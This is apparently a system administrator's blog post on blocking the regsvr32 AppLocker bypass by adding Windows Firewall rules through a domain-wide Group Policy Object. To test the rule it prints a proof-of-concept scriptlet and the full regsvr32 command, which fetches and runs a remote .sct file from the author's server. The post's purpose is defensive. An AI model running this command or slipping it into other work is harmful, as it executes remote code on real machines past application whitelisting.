A recently discovered method of bypassing AppLocker by using regsvr32.exe, poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions). To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall. Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.
Create a GPO and Edit
In Group Policy Management, I created a new GPO and named it Firewall: Block regsvr32 then I edited it.
Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security
Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.
Create a new inbound rule to block regsvr32.exe
Inbound Rule Wizard
Choose Program as the type of rule to create and click Next >
Use C:windowssystem32regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose.
Choose Block as the action and click Next >
Apply it to all network locations.
Give the rule a name and possibly a description.
Rule to block is now listed in Inbound Rules
Outbound Rule Wizard
Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.
Now that the GPO is created, you can link the policy within your domain as usual.
To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.
I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file and save it (doesn’t have to be extension .SCT, can be anything…).
<!-- Proof Of Concept - Casey Smith @subTee -->
var r = new ActiveXObject(WScript.Shell).Run(cmd.exe);
Command to run:
regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll
If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).